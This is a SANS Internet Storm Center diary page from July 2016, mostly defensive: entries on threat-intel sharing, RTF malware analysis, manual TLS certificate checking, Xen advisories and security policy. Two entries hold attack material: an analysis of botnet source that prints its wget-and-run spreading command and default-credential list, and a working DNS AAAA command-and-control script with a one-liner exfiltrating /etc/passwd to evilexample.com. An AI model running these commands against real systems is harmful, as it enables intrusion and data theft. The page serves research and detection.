Diaries

Published: 2016-07-31

Sharing (intel) is caring... or not?

I think almost every one of us working in the IR/Threat Intel area has faced this question at least once: shall we share intel information?

Although I have my own opinion on this, I will try to state some of the most common arguments I have heard in these years, pro and against sharing publicly, as objectively as possible not to influence the reader.

Why not sharing publicly?

  • Many organizations do not share because do not want to give away the information that they (may) have been attacked or breached. On this regard, there are closed trusted groups of organizations within the same sector (e.g. ISAC communities) where the willingness to share in such closed environments increases.
  • Trust is an extremely important factor within the intelligence community, and establishing trust is impossible when sharing publicly. Moreover, by not knowing with whom they are sharing, people are inclined to share less or not to share at all.
  • Part of the community suggests that we should “stop providing our adversaries with free audits”[1], since in many occasions it has been observed a clear change within the TTP after the publications of analysis’ results on blogs or reports.

 

Why sharing publicly? 

  • Relegating everything to sub communities may bring the problem of missing the big picture, since this may tend to create silos on the long term, and organizations relying entirely on them may miss the opportunity to correlate information shared from organizations belonging to other sectors.
  • Many small organizations may not always be able to afford getting access to premium intelligence services, nor to enter in any of these closed sub-communities for several reasons. 
  • Part of the community believes that we should share publicly because bad guys just don’t care and this is also proven by the fact that often times they reuse the same infrastructure and modus operandi.
  • By sharing only within closed groups, those mostly affected would be DFIR people who uses such public information as their source of intel to understand if they have been compromised or not.


What is your view on this?

Pasquale

[1] – “When Threat Intel met DFIR”, http://archive.hack.lu/2015/When%20threat%20intel%20met%20DFIR.pdf

3 Comments

Published: 2016-07-30

rtfobj

Yesterday I mentioned rtfobj.

Philippe told me that version 0.48 will parse the sample I analyzed yesterday. 0.48 is not a stable version (0.47 is), but you can download it from Github.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2016-07-29

Malicious RTF Files

About a year ago I received RTF samples that I could not analyze with RTFScan or rtfobj (FYI: Philippe Lagadec has improved rtfobj.py significantly since then). So I started to write my own RTF analysis tool (rtfdump), but I was not satisfied enough with the way I presented the analysis result to warrant a release of my tool. Last week, I started analyzing new samples and updating my tool. I released it, and show how I analyze sample 07884483f95ae891845caf0d50ce507f in this diary entry.


This sample is an heavily obfuscated RTF file. RTF files are essentially sets of nested strings that start with { and end with }. Like this (strongly simplified):

{\rtf {data {more data}}}.

Malicious RTF files contain a payload. Objects in RTF files are embedded in hexadecimal, like this (strongly simplified):
{\rtf {data
{\*\objdata
01050000
02000000
08000000
46696C656E616D6500000000000000...
}}}

Malicious RTF files obfuscate the hexadecimal data in many ways, one of them is to put extra control strings inside the hexadecimal data, like this:
{\rtf {data
{\*\objdata
01050000
02000000
08000000
46696C656E61{\obj}6D6500000000000000...
}}}

The sample I analyzed takes this to the extreme. After each hexadecimal digit, extra control strings and whitespace are inserted:


(I removed a lot of whitespace to be able to put several hexadecimal digits on the screen).
The hexadecimal digits (highlighted in red) are 01050…

My tool outputs a line of analysis data for each nested string. In this sample, because of the obfuscation, there are a lot of them (22956, which is gigantic for an RTF file).

But you can reduce the output by filtering for entries that (potentially) contain an embedded object using option -f O:

Entry 165 is the one we will take a closer look at first. The information presented for entry 165 is the following: the nesting level is 4, it has 1 child (c=), starts at position 2ae5 in the file (p=), is 1194952 bytes long (l=), has 11429 hexadecimal digits (h=), has no \bin entries (b=), contains an embedded object (O), has 1 unknown character (u=) and is named \*\objdata133765.

We can select entry 165 for closer analysis:

I highlighted the hexademical digits in red.

To decode the hexadecimal data, we use option -H:

You can see the hex data clearly now: 01 05 00 ...

Since this is an embedded object, we use option -i to get more info on the object:

From the magic header, we see that the embedded object is an OLE file (FYI: if we analyze it with oledump, we get parsing errors).

Looking further into the data (-H), we see stream entries in the output:

And a bit further, we even find a URL:

Taking a closer look, I don't only see a URL, but hex data that looks like shellcode.

We can select this shellcode by cutting if out of the stream (option -c):

And of course also dump it to a file (option -d), so that we scan analyze it with the shellcode analyzer from libemu:

So this RTF file is a downloader.

The presence of shellcode in an RTF file is often an indication of an exploit. rtfdump supports YARA (like many of my *dump tools):

The first YARA search doesn't find anything. But the second search with option -H (to decode the hexadecimal content to binary) has hits for my RTF_ListView2_CLSID YARA rule. This indicates that entry 165 contains a byte sequence for the ListView2 classid, so this is very likely an exploit for vulnerability CVE-2012-0158 in this ListView.

The set of samples I looked at last week are characterized by the following properties:

they start with {\rtfMETAX

they end with this:

If you have interesting tools or techniques to analyze RTF files, please post a comment.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

5 Comments

Published: 2016-07-28

Verifying SSL/TLS certificates manually

I think that we can surely say that, with all its deficiencies, SSL/TLS is still a protocol we cannot live without, and basis of today’s secure communication on the Internet. Quite often I get asked on how certificates are really verified by browsers or other client utilities. Sure, the canned answer that “certificates get signed by CA’s and a browser verifies if signatures are correct” is always there, but more persistent questions on how it exactly works happen here and there as well.

So, if you ever wondered on how a certificate could be fully manually verified by checking all the steps, this is a diary for you! In this example we will manually verify the certificate of the site you are reading this diary on, https://isc.sans.edu. We will use the openssl utility so you can replicate all the steps for any certificate on any machine where you have openssl. Here we go.

In order to get the certificate we want to verify we can simply connect to https://isc.sans.edu with the openssl utility. For that, the s_client command will be handy and it will print out the certificate in PEM format on the screen so we just have to catch it and put it into a file:

$ openssl s_client -connect isc.sans.edu:443 < /dev/null | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > isc.sans.edu.pem

The isc.sans.edu.pem file now contains the certificate from isc.sans.edu. We could try to verify it with openssl directly as shown below:

$ openssl verify -verbose isc.sans.edu.pem
isc.sans.edu.pem: C = US, postalCode = 20814, ST = Maryland, L = Bethesda, street = Suite 205, street = 8120 Woodmont Ave, O = The SANS Institute, OU = Network Operations Center (NOC), OU = Unified Communications, CN = isc.sans.edu
error 20 at 0 depth lookup:unable to get local issuer certificate

Hmm, no luck. But that is because the CA file that comes with Linux by default is missing some of the intermediates. Those either have to be in the CA store, or the server has to deliver the whole chain to us when we initially connect. Ok, not a problem – let’s continue manually.
First we can see who the issuer really here is, and what are the certificate’s parameters:

$ openssl x509 -in isc.sans.edu.pem -noout -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            24:21:68:a7:55:13:74:1a:d1:95:fb:62:26:90:c9:1d
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA
        Validity
            Not Before: Apr  7 00:00:00 2015 GMT
            Not After : Apr  6 23:59:59 2018 GMT
        Subject: C=US/postalCode=20814, ST=Maryland, L=Bethesda/street=Suite 205/street=8120 Woodmont Ave, O=The SANS Institute, OU=Network Operations Center (NOC), OU=Unified Communications, CN=isc.sans.edu

Ok, so the certificate is valid, and it is signed by Comodo, as you can see in the highlighted line. The part that matters to the browsers is actually only the CN component. In the Subject field we can see that the CN matches our site (isc.sans.edu) and in the Issuer field we can see that that signing CA (which is an intermediate CA) is called COMODO RSA Organization Validation Secure Server CA.

We can verify this information in the RFC2253 format as well, for both the subject and issuer; this will be easier to read:

$ openssl x509 -in isc.sans.edu.pem -noout -subject -issuer -nameopt RFC2253
subject= CN=isc.sans.edu,OU=Unified Communications,OU=Network Operations Center (NOC),O=The SANS Institute,street=8120 Woodmont Ave,street=Suite 205,L=Bethesda,ST=Maryland,postalCode=20814,C=US
issuer= CN=COMODO RSA Organization Validation Secure Server CA,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB

So, let’s first try getting the CAcert file that is used by Mozilla. This might help us verify everything. That being said, getting the CAcert file from Mozilla is not all that trivial and some extractions/conversions should be done. Luckily, the good folks at curl already publish the cacert file in the PEM format so we can get it from their web; it’s available at https://curl.haxx.se/docs/caextract.html

$ curl https://curl.haxx.se/ca/cacert.pem -o cacert.pem

The file even contains name of CA’s in plain text. Let’s search for Comodo:

$ grep -i Comodo cacert.pem
Comodo AAA Services root
Comodo Secure Services root
Comodo Trusted Services root
COMODO Certification Authority
COMODO ECC Certification Authority
COMODO RSA Certification Authority

It doesn’t have the one that we need: remember that it must match precisely to the CN field! This also confirms that it is an intermediate CA. We will probably have to find the intermediate CA’s certificate on Comodo’s web site. Let’s paste the name into Google (“COMODO RSA Organization Validation Secure Server CA“) and see what we get.

The first hit will lead us to https://support.comodo.com/index.php?/Default/Knowledgebase/Article/View/968/108/intermediate-ca-2-comodo-rsa-organization-validation-secure-server-ca-sha-2 and sure - this is were our intermediate CA is. Let’s download it:

$ curl 'https://support.comodo.com/index.php?/Knowledgebase/Article/GetAttachment/968/821025' > comodo.crt

Now let’s check the issuer and subject here as well:

$ openssl x509 -in comodo.crt -subject -issuer -noout -nameopt RFC2253
subject= CN=COMODO RSA Organization Validation Secure Server CA,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB
issuer= CN=COMODO RSA Certification Authority,O=COMODO CA Limited,L=Salford,ST=Greater Manchester,C=GB

Great! That’s exactly what we need – see that the Subject field (the CN component) matches exactly to the signer of our certificate. We are lucky even with the issuer:

$ grep "COMODO RSA Certification Authority" cacert.pem
COMODO RSA Certification Authority

It is a root CA, that exists in Mozilla cacert.pem – so we have the full chain!
Let’s get back to verifying our certificate from isc.sans.edu. First we need to check which signature algorithm has been used:

$ openssl x509 -in isc.sans.edu.pem -noout -text | grep Signature
    Signature Algorithm: sha256WithRSAEncryption

Ok, SHA256 with RSA (great job Johannes on renewing the cert properly :)). What does this mean? This means that the critical parts of the certificate have been hashed by the CA with the SHA256 hashing algorithm and then encrypted with CA’s private key. It’s public key is available in the comodo.crt file we just downloaded (and isc.sans.edu’s public key is in the certificate we got from the web site). Openssl can confirm that as well for us:

$ openssl x509 -in isc.sans.edu.pem -noout -text

        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (4096 bit)
                Modulus:
                    00:d4:8f:58:63:f4:30:0b:ad:05:d0:37:f1:69:97:
                    6e:27:90:a5:dd:43:d7:c5:30:0d:dc:73:80:6a:fc:

What we need to do know is the following:

  • We need to extract the signature from the certificate and then use Comodo’s public key to decrypt it; with this we will get the SHA256 hash of the certificate
  • Then we need to calculate our own SHA256 hash of the certificate
  • If those two match: the certificate is signed properly

In order to extract components of a certificate we need to decode it to ASN.1 format. Luckily, openssl can do that for us, so let’s see what we get on isc.sans.edu’s certificate:

$ openssl asn1parse -in isc.sans.edu.pem

1582:d=1  hl=2 l=  13 cons: SEQUENCE
 1584:d=2  hl=2 l=   9 prim: OBJECT            :sha256WithRSAEncryption
 1595:d=2  hl=2 l=   0 prim: NULL
 1597:d=1  hl=4 l= 257 prim: BIT STRING

So, the last object is actually the signature – it starts at offset 1597, so let’s extract it with openssl:

$ openssl asn1parse -in isc.sans.edu.pem -out isc.sans.edu.sig -noout -strparse 1597

Now we got the file isc.sans.edu.sig, which is RSA encrypted SHA256 of the signature. How do we decrypt it? We need Comodo’s public key, which is available in its certificate, so let’s extract it:

$ openssl x509 -in comodo.crt -pubkey -noout > comodo.pub

Now that we have the Comodo’s public key, we can finally decrypt the SHA256 hash. It will work only if the original has been encrypted with the corresponding private key. We’ll get an ASN.1 structure back so let’s show it properly as well on the screen:

$ openssl rsautl -verify -pubin -inkey comodo.pub -in isc.sans.edu.sig -asn1parse
    0:d=0  hl=2 l=  49 cons: SEQUENCE
    2:d=1  hl=2 l=  13 cons:  SEQUENCE
    4:d=2  hl=2 l=   9 prim:   OBJECT            :sha256
   15:d=2  hl=2 l=   0 prim:   NULL
   17:d=1  hl=2 l=  32 prim:  OCTET STRING
      0000 - 4b ca b8 23 4d 52 da e1-31 f1 0d b0 ba 3d 33 6b   K..#MR..1....=3k
      0010 - 0e 3d 68 0f 99 cb 35 43-69 ff 70 d0 1d a6 ef c1   .=h...5Ci.p.....

Yay, it worked. So it has been encrypted properly. The highlighted part is actually the SHA256 hash.
The last step now is to extract the critical parts of the certificate and verify if both hashes match. So what are the critical parts of the certificate? The X509 standard defines it as a so called TBSCertificate (To Be Signed Certificate), and it is the first object in the certificate:

$ openssl asn1parse -in isc.sans.edu.pem 
    0:d=0  hl=4 l=1854 cons: SEQUENCE
    4:d=1  hl=4 l=1574 cons: SEQUENCE
    8:d=2  hl=2 l=   3 cons: cont [ 0 ]
   10:d=3  hl=2 l=   1 prim: INTEGER           :02
   13:d=2  hl=2 l=  16 prim: INTEGER           :242168A75513741AD195FB622690C91D
   31:d=2  hl=2 l=  13 cons: SEQUENCE
   33:d=3  hl=2 l=   9 prim: OBJECT            :sha256WithRSAEncryption

Ok, the first object starts at offset 4, let’s extract it the same way as before:

$ openssl asn1parse -in isc.sans.edu.pem -out tbsCertificate -strparse 4

The file tbsCertificate contains what we need to run SHA256 has over. We can again use openssl for that:

$ openssl dgst -sha256 -hex tbsCertificate
SHA256(tbsCertificate)= 4bcab8234d52dae131f10db0ba3d336b0e3d680f99cb354369ff70d01da6efc1

Remember the decrypted ASN.1 object? Scroll up – or let me paste it here one more time (this diary is already longer than I thought really):


   17:d=1  hl=2 l=  32 prim:  OCTET STRING
      0000 - 4b ca b8 23 4d 52 da e1-31 f1 0d b0 ba 3d 33 6b   K..#MR..1....=3k
      0010 - 0e 3d 68 0f 99 cb 35 43-69 ff 70 d0 1d a6 ef c1   .=h...5Ci.p.....

Yay! It’s a full, 100% match. So the certificate is correctly signed by Comodo’s intermediate. We could now repeat all the steps to verify if the intermediate CA is correctly signed by the root CA that we got from Mozilla’s cacert.pem, but we can also have openssl do that for us, we just need to tell it with CA file to use:

$ cat comodo.crt >> cacert.pem
$ openssl verify -verbose -CAfile cacert.pem isc.sans.edu.pem
isc.sans.edu.pem: OK

And that get’s us to the end of verification.

-- Bojan
https://twitter.com/bojanz
INFIGO IS

3 Comments

Published: 2016-07-27

Critical Xen PV guests vulnerabilities

Xen released a patch to fix a critical vulnerability affecting x86 PV[1] guests. A malicious administrator on a vulnerable guest could escalate his privileges to that of the host. All versions of Xen are reported vulnerable but only on x86 hardware. A mitigation is to run only HVM[2] guests but patch as soon as possible. The security advisory is available here (CVE-2016-6258).

A second advisory has been released which affects 32bits PV guests and may cause a crash of the hypervisor resulting in a denial of service for other guests. The security advisory is available here (CVE-2016-6259).

[1] Paravirtualization is an efficient and lightweight virtualization technique introduced by Xen, later adopted also by other virtualization solutions. Paravirtualization doesn't require virtualization extensions from the host CPU. However paravirtualized guests require special kernel that is ported to run natively on Xen, so the guests are aware of the hypervisor and can run efficiently without emulation or virtual emulated hardware. Xen PV guest kernels exist for Linux, NetBSD, FreeBSD, OpenSolaris and Novell Netware operating systems.

[2] Hardware Virtual Machine (full virtualization)

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2016-07-27

Analyze of a Linux botnet client source code

I like to play active-defense. Every day, I extract attacker's IP addresses from my SSH honeypots and perform a quick Nmap scan against them. The goal is to gain more knowledge about the compromised hosts. Most of the time, hosts are located behind a residential broadband connection. But sometimes, you find more interesting stuff. When valid credentials are found, the classic scenario is the installation of a botnet client that will be controlled via IRC to launch multiple attacks or scans. Malicious binaries are pre-compiled for many architectures but, this time, I felt lucky and got access to the source code! I found a compromised host (located in the Seychelles) that was hosting pre-compiled binaries and the source code of the botnet client itself. I had a quick look of course...

Honestly, the client is not very complex and only basic features are implemented but it helps to understand how to code malicious software. First of all, only one C&C server was hardcoded in the source code (also located in the Seychelles) but the client can handle multiple servers. I presume that binaries are compiled with a new C&C every time a new campaign is started. The connection occurred on an unusual port: 9271 (the default one being 6667 - IRC).

Once started, the client forks itself, tries to connect to its C&C. If it does not work, it sleeps for five seconds and tries the next one (if configured).

if (pid1 = fork()) {
    waitpid(pid1, &status, 0);
    exit(0);
} else if (!pid1) {
    if (pid2 = fork()) {
        exit(0);
    } else if (!pid2) {
    } else {
}
} else {
}

setsid();
signal(SIGPIPE, SIG_IGN);

while(1)
{
    if(initConnection()) { sleep(5); continue; }
    ....
}

Once successfully connected, it enters the main loop waiting for commands. The following ones were implemented:

  • PING (expecting a classic “PONG” reply)
  • GETLOCALIP (returns the local IP address of the bot)
  • SCANNER [ON|OFF] (starts or stops the Telnet scanner - see below)
  • EMAIL
  • HOLD <:port>
  • ip>
  • target>
  • target>

The "SCANNER" command looks the most interesting one, it implements a basic Telnet scanner. It generates random public IP addresses with the following function:

in_addr_t getRandomPublicIP()
{
    if(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)
        {
            ipState[1]++;
            ipState[2]++;
            ipState[3]++;
            ipState[4]++;
            char ip[16];
            szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
            return inet_addr(ip);
        }

    ipState[1] = 0;
    ipState[2] = 0;
    ipState[3] = 0;
    ipState[4] = 0;
    while(
            (ipState[1] == 0) ||
            (ipState[1] == 10) ||
            (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
            (ipState[1] == 127) ||
            (ipState[1] == 169 && ipState[2] == 254) ||
            (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
            (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
            (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
            (ipState[1] == 192 && ipState[2] == 168) ||
            (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
            (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
            (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
            (ipState[1] >= 224)
        )
        {
            ipState[1] = rand() % 255;
            ipState[2] = rand() % 255;
            ipState[3] = rand() % 255;
            ipState[4] = rand() % 255;
        }

    char ip[16];
        szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
    return inet_addr(ip);
}

Then, it tries to connect to port 23 and to authenticate using a list of hardcoded credentials:

char *usernames[] = {"root\0", "\0", "admin\0", "user\0", "login\0", "guest\0", "user\0","pi\0","support\0"};
char *passwords[] = {"root\0", "\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "pass\0", "password\0","alpine\0","raspberry\0","support\0", "ubnt\0"};

If the connection is successful, it tries to download and install itself. On the same server, multiple precompiled binaries are available for multiple architectures (i386, x64, arm, mips, ...).

if(send(fds[i].fd, "cd /tmp; wget http://x.x.x.x/bins.sh;chmod 777 bins.sh;sh bins.sh;busybox tftp -r tftp2.sh -g x.x.x.x;chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *\r\n", 157, MSG_NOSIGNAL) < 0)
{
    sclose(fds[i].fd); 
    fds[i].state = 0;
    fds[i].complete = 1;
    continue;
}

The email feature looked experimental because some part of the code was commented out and the "From" field was also hardcoded:

if(send(fd, "HELO rastrent.com\r\n", 19, MSG_NOSIGNAL) != 19) { close(fd); return; }
if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
memset(buffer, 0, 1024);

if(send(fd, "MAIL FROM: \r\n", 33, MSG_NOSIGNAL) != 33) { close(fd); return; }
if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
memset(buffer, 0, 1024);

The domain rastrent.com is registered but not used at the moment. Here are passive DNS records found:

2015-11-06 184.154.229.207
2015-02-24 69.64.147.242
2014-10-14 208.43.167.119

About the flood commands, the "UDP" and "TCP" ones are classic. The "JUNK" command just send random data (by block of 1KB) into a TCP connection:

//nonblocking sweg
makeRandomStr(watwat, 1024);
if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
{
     close(fds[i].fd);
     fds[i].state = 0;
}

This is not a very complex example but it shows how a badly protected Linux box can be infected and integrated into a botnet to generate malicious activity. The fact that the main feature is a Telnet scanner and the presence of binaries for multiple architectures tend to think for the botnet targets residential routers or small embedded Linux like storage devices. In the mean time, the server hosting the source code and binaries is offline for 24 hours. The hardcoded C&C server is still alive.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

3 Comments

Published: 2016-07-26

Command and Control Channels Using "AAAA" DNS Records

Data exfiltration and command and control channels via DNS are nothing new exactly. In many ways, DNS is an ideal covert channel. Even well-protected systems usually can connect to a recursive name server that will forward queries to any authoritative name server. The "bucket chain" of DNS servers will bypass whatever firewall is used to protect the system. Intrusion detection systems have implemented signatures for abnormally large queries, but often valid domain names are rather long, in particular, if they are associated with public clouds or content delivery networks. DNSSEC records also tend to trigger some of these signatures.

Traditionally, an infected system will exfiltrate data using "A" records, and then request new commands to be executed using "TXT" records. While A records work great to exfiltrate data, "TXT" records are more problematic as they are less commonly used and tend to "stick out" more.

Note that we are not interested in implementing a complete "IP over DNS" tunnel here like dnscat2 or iodine. We try to be stealthy on the network by using as few and as normal DNS queries as possible, and we are trying to be covert on the system by using common command line tools instead of installing additional software that may trigger anti-malware systems.

There are a couple of methods that can be used to return more meaningful data than an IPv4 address in a DNS "A" query response:

  • Additional information: sort of anything goes here, but the recursive DNS server doesn't necessarily pass the information along
  • The response includes a copy of the query. One could modify the query part of the response (after all, we don't expect the response to be used in the traditional sense).

But to do either, we need a custom DNS server. I was trying to find a way to pass data back to the infected system without having to code up a new DNS server (ok, there is Scapy ;-) ... maybe that will be a second diary).

"AAAA" records, on the other hand, return four times as much data as "A" records, and by returning multiple "AAAA" records, we can encode reasonably complex commands. We could do the same with "A" records, but doing so with "AAAA" records turns out to be a lot simpler.

 

First, we need to encode a set of commands in "AAAA" records. To do this, we convert the content of the file we are trying to encode into hex, and then use the dynamic DNS utility "nsupdate" to add the respective records to our zone (I am using "evilexample.com" here):

file2ipv6.sh:

#!/bin/sh
n=2000
echo server localhost
echo zone evilexample.com
echo prereq yxrrset a.evilexample.com AAAA
echo update delete a.evilexample.com
echo send
for b in `xxd -p -c 14 $1 | sed 's/..../&:/g' | sed 's/:$//' `; do
 f=$n:$b
 f=`echo $f | sed 's/:..$/&00/'`
 f=`echo $f:0000:0000:0000:0000:0000:0000:0000:0000 | head -c39`
 echo update a.evilexample.com. 10 AAAA $f
 n=$((n+1));
done
echo send

Lets incode the following string (in "sample.txt"):

for b in `xxd -p /etc/passwd`; do dig +short $b.evilexample.com; done

This command, once executed on the receiving end, will exfiltrate the content of /etc/passwd

Next, we use file2ipv6.sh to create the necessary AAAA records. nsupdate will pass the commands to the authoritative name server. the "dns.key" is the update key for the zone you are using (if you configured one).

./file2ipv6.sh sample.txt | nsupdate -k dns.key 

Once this completes, you should see the following AAAA records:

$ dig +short AAAA a.evilexample.com
2003:7274:2024:622e:6576:696c:6578:616d
2004:706c:652e:636f:6d3b:2064:6f6e:650a
2000:666f:7220:6220:696e:2060:7878:6420
2001:2d70:202f:6574:632f:7061:7373:7764
2002:603b:2064:6f20:6469:6720:2b73:686f

Note how the first two bytes are used as a "serial number" as the order in which the records are returned may change.

On the receiving end (infected system), we can now extract the data with a simple shell script:

dig +short AAAA a.evilexample.com | sort -n  | cut -f2- -d':' | tr -d ':' | xxd -p -c 14 -r

To execute the script above, just enclose it in backticks, add it to a cron job or whatever, and you got a command and control channel over IPv6. Best part: All you need on the infected host is a shell script.

You can find the script above on github: https://github.com/DShield-ISC/IPv6DNSExfil

Why use bash vs. perl/python? Because it works!  

How do we detect these covert channels?

The best method is likely to monitor the volume of DNS queries from particular hosts. Mail servers tend to sent a lot of DNS queries. But other, normal servers, will only send few. You could implement rate limiting on the recursive web server to disrupt the covert channel, or just monitor your query logs or traffic logs to detect abnormal volumes of DNS traffic from particular hosts. 

Further Reading:

[1] https://www.sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf
[2] https://isc.sans.edu/diary/Packet%2BTricks%2Bwith%2Bxxd/10306
[3] https://github.com/iagox86/dnscat2
[4] http://code.kryo.se/iodine/

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

 

0 Comments

Published: 2016-07-25

Python Malware - Part 4

You don't always get a text file with source code when you extract Python code from a PyInstaller-produced EXE.

I produced the following Python code including shellcode, and generated an EXE with PyInstaller:

Then I extract the Python code:

This time, the extracted shellcode file doesn't contain Python source code:

It's actually compiled Python bytecode.

Add the following 8 bytes to the beginning of the file and save it as shellcode.pyc:

Now you can use a Python bytecode decompiler like Easy Python Decompiler:

Here is the recovered source code (shellcode.pyc_dis):

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2016-07-23

It Is Our Policy

How many times have you heard someone say out loud our "our security policy requires..."? Many times we hear and are sometimes even threatened with "the security policy". Security policy should set behavioral expectations and be the basis for every technical, administrative and physical control that is implemented. Unfortunately, solid security policies are often elusive for several key reasons.
 
I regularly get the question, "How many security policies should I have”? My response is often found by raising my hands and wiggling my fingers in the air. There is nothing magic about the number of security policies, my observation is that many times there are more security policies than are actually needed.  
 
One of the most important aspects of a security policy, just like the jar of mayonnaise in your refrigerator, is an Expiration Date. This non technical control can help facilitate regular updates to account for current issues being faced and capabilities that may not have existed when the security policy was originally created. Think of this as a built in process to ensure that it is regularly reviewed - consider a recurring calendar reminder.
 
Should your employees be expected to memorize all of your security policies and is that even realistic for them? I hope not for their sake. What if you redefine the win by each of your employees knowing where to find the policy when faced with a decision? A Central Location for security policies, versus being spread all over your company is best and can serve as the set of guardrails to protect both the employee and the company. This will serve as a key resource for everyone to go to when regular faced with a decision of "is this allowed or not in the security policy”. 
 
Finally, as you start to develop or even assess the quality of your security policy, there are several Key Stakeholders, often outside of the information security team, who can provide valuable feedback specific to their respective areas.
  • Human Resources - Because many times employee behavior is involved in an incident
  • Legal - Because many times employee behavior is involved in an incident
  • Privacy - Because sometimes personally identifiable information is involved in an incident
  • Information Security - Because threats against company systems and data are involved in an incident
  • Physical Security - Because sometimes an employee needs to be encouraged to leave as a part of an incident
 
Take a look at the SANS policy website and look for any any topics that may be missing in your organization.
 
All that said, what two things can you do next week to improve your security policies? Let us know in the comments area!
 
Russell Eubanks

 

3 Comments

Published: 2016-07-22

The life of an IT Manager

It is true, I am back after a 2 year hiatus from my duties as a Handler at the Internet Storm Center.  Some may be wondering why.  So here it is.

It all started with my new job. I was hired by a company 2 years ago to help move their IT Department forward.  The owner told me it would be a challenge but I accepted the challenge.  They have 6 remote locations plus the corporate office and I would be the 2nd employee in the IT department taking care of all of the locations. That is where the story begins and a challenge it was.  My first week on the job I learned that they did not have successful backup jobs running for the 22 Windows servers.  Several of the servers were standalone devices that ranged in age from 4 years to 14 years old. They were a mess and the group policies, DNS, DHCP and Active Directory were a disaster. No backups in place for their critical desktop computers and no anti-virus solution company wide. They had no firewalls, no IPS, no spam filter, Windows updates were hit and miss depending on whether the employee took the time to install them.  There were a number of issues with the MPLS between the branches and a hodge podge of phone systems.  They had no security in place, no Disaster Recovery Plans. Our mail server was blocklisted twice in the first 3 months of my employment so I had some work to do there as well.  They are self-insured so had HIPAA requirements to deal with which weren’t happening.  So as you can see it was definitely a challenge.

As of today we have made great progress.  We have replaced the old servers with new servers but instead of individual boxes we have migrated to virtual machines. We now have 6 physical boxes that are hosting all of the servers. All of the servers are being backed up to a recovery server that is on site as well as to a recovery server that is at one of our remote locations. All of our workstations are being backed up using a 3rd party off-site backup program. We have installed firewalls/IPS, a spam filter, cleaned up our AD (still a lot of work to do), installed Microsoft WSUS, a managed anti-virus/anti-malware solution, moved all phone systems at all locations to the same platform and have begun standardizing hardware and software throughout the organization. Our mailserver has not been blocklisted since I completed the changes to our mail records for compliance and our network lockdown was completed. We are rolling out perimeter security with a digital camera system inside and outside of the facilities at each location and we are in the process of reviewing going from copper to fiber for our MPLS network.

I have completed the initial HIPAA compliance requirements and have started working on the Disaster Recovery. I have monitoring and reporting setup for all aspects of the network infrastructure to attempt to ensure that our network remains safe and secure. Great progress has been made but we have a lot of work yet to do.  I am now the IT Manager and Security and Compliance Officer for the organization. We had a ransomware attempt a few months ago and thankfully it was unsuccessful because of the precautions and preventative measures that have been implemented.

I am sure that I am not the only IT person that has walked into this type of situation and I am sure I won’t be the last.  IT is so fluid and continuously changing and the threats to the environment have changed too.  One of my IT friends said it is like shooting fish in a barrel and I have to agree.

Deb Hale

3 Comments

Published: 2016-07-21

Practice ntds.dit File

I know many people that like password cracking. Or that would like to try it out.

That's why I published an Active Directory database file to practise hash extraction and password cracking. You can find it here.

If you know other resources to practise hash extraction and password cracking, please post a comment.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

1 Comments

Published: 2016-07-20

Guest Diary, Etay Nir: Flipping the Economy of a Hacker

Flipping the economy of a Hacker

 

Palo Alto Networks partnered with the Ponemon Institute to answer a very specific question: what is the economic incentive for adversaries?

Ponemon was chosen as they have a history of crafting well respected cybersecurity research, including their well know annual “cost of a data breach” reports. The findings are based on surveys and interviews with Cybersecurity experts, including current or former attacks. These are all individuals who live and breathe security, many of whom have conducted attacks. Nearly 400 individuals were part of the research, across the United States, Germany and the United Kingdom.

When you think about security research, most of the focus has been on how attackers get in, and the damage they cause once they are inside. We set out to approach this problem from a completely different angle: understand the economic motivations of an attack, the factors that influence this, and be able to leverage this data to help organizations better respond to attacks. If we can remove the motivation, we can decrease the number of successful attacks. It is as simple as that.

You can download the full report from: http://media.paloaltonetworks.com/lp/ponemon/report.html and

http://www.ponemon.org/library/flipping-the-economics-of-attacks

There are clear highlights I believe that can influence your understanding of attackers, and influence your ability to defend yourself from them:

  • The majority of attackers (72 percent) were opportunistic, not wasting time on efforts that do not quickly yield high-value information. While advanced nation state actors employ lots of planning, think about the average attacker as the mugger on the street, versus “Ocean’s Eleven” crew that spends weeks planning a complicated high stakes heist. When put into this context, organizations that prioritize making themselves a harder target, will actively deter a significant amount of potential breaches.
